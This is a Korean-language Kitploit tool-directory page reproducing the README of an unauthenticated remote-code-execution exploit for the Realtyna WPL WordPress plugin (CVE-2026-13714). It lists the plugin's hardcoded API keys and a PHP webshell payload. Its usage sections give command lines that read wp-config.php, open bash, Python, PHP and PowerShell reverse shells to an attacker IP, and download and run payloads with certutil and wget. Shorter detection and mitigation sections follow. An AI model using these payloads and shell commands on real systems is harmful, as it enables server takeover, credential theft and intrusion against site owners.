Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-13714 — Realtyna WPL < 5.3.0을 위한 인증되지 않은 RCE 익스플로잇으로, 하드코딩된 API 키를 통해 PHP 웹셸을 업로드하고 임의의 시스템 명령을 실행합니다. | Kitploit
도구/GitHubGitHub/katransefa/cve-2026-13714
ExploitationWeb Application ExploitationPost-ExploitationPenetration TestingPayload Development
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Realtyna WPL < 5.3.0을 위한 인증되지 않은 RCE 익스플로잇으로, 하드코딩된 API 키를 통해 PHP 웹셸을 업로드하고 임의의 시스템 명령을 실행합니다.

저장소 보기
4일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Realtyna WPL < 5.3.0 - 인증되지 않은 RCE 익스플로잇

설명

이 익스플로잇은 Realtyna Organic IDX + WPL Real Estate 플러그인 5.3.0 이전 버전의 심각한 취약점을 대상으로 합니다. 이 플러그인은 하드코딩된 자격 증명을 사용하며, 인증되지 않은 파일 업로드를 허용하여 원격 코드 실행(RCE)으로 이어집니다.

취약점 세부 정보

  • CVE ID: CVE-2026-13714
  • 영향받는 버전: < 5.3.0
  • 유형: 인증되지 않은 임의 파일 업로드를 통한 RCE
  • 연구자: Thom Stackhouse

기술적 세부 사항

이 플러그인에는 하드코딩된 자격 증명이 포함된 I/O API가 기본적으로 활성화되어 있습니다:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

API는 파일 유형을 검증하지 않으므로 임의의 PHP 파일 업로드가 가능합니다.

설치

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

사용 방법

기본 사용법

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

일반적인 명령

Linux 대상

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Windows 대상

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

고급 사용법

리버스 셸 (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

리버스 셸 (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

사용자 정의 페이로드 업로드 및 실행

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

익스플로잇 흐름

  1. 업로드: PHP 웹셸(<?php system($_GET['c']); ?>)을 업로드합니다.
  2. 위치: 파일이 wp-content/uploads/WPL/<ID>/shell.php에 저장됩니다.
  3. 실행: shell.php?c=COMMAND를 통해 명령을 실행합니다.

탐지

익스플로잇 탐지 방법

  • /wp-content/uploads/WPL/*/에서 의심스러운 파일을 확인합니다.
  • wplview=io, wplformat=io, cmd=set_property 매개변수가 있는 요청을 모니터링합니다.
  • 하드코딩된 자격 증명을 사용하는 의심스러운 API 요청을 찾습니다.

침해 징후

  • 업로드 디렉터리에 있는 예상치 못한 PHP 파일
  • 시스템 명령이 포함된 비정상적인 웹 요청
  • WordPress에 생성된 새로운 관리자 사용자
  • 수정된 .htaccess 파일

완화

수정 방법

  1. WPL Real Estate 버전 5.3.0 이상으로 즉시 업데이트하십시오.
  2. 업데이트가 불가능한 경우 I/O API를 비활성화하십시오:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. 하드코딩된 자격 증명을 변경하십시오.
  4. 적절한 파일 형식 검증을 구현하십시오.
  5. 파일 업로드 디렉터리를 제한하십시오.

보안 권장 사항

  • 모든 WordPress 플러그인을 최신 상태로 유지
  • 웹 애플리케이션 방화벽(WAF) 사용
  • 정기적인 보안 감사
  • 파일 업로드 디렉터리 모니터링
  • 불필요한 API 비활성화

스크린샷

성공적인 익스플로잇

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

면책 조항

이 익스플로잇은 교육 및 승인된 테스트 목적으로만 사용됩니다. 소유하지 않았거나 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.

법적 사용

  • 소유한 시스템에서만 사용
  • 명시적인 서면 허가를 받은 경우에만 사용
  • 책임 있는 공개 관행 준수
  • 취약점을 공급업체에 신고

라이선스

이 프로젝트는 교육 목적으로만 제공됩니다. 사용에 따른 책임은 본인에게 있습니다.

크레딧

  • 최초 연구자: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

참고 자료

  • WPScan 취약점 페이지
  • CVE-2026-13714

변경 이력

v1.0 (2026-08-17)

  • 최초 릴리스
  • 인증되지 않은 파일 업로드
  • 원격 코드 실행
  • 명령 실행 지원

기여

개선 사항에 대한 이슈와 풀 리퀘스트를 자유롭게 제출해 주세요.

지원

문제나 질문이 있으시면 GitHub에 이슈를 열어 주세요.


⚠️ 경고: 이 도구는 보안 연구 및 교육 목적으로만 제공됩니다. 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오.

도구 다운로드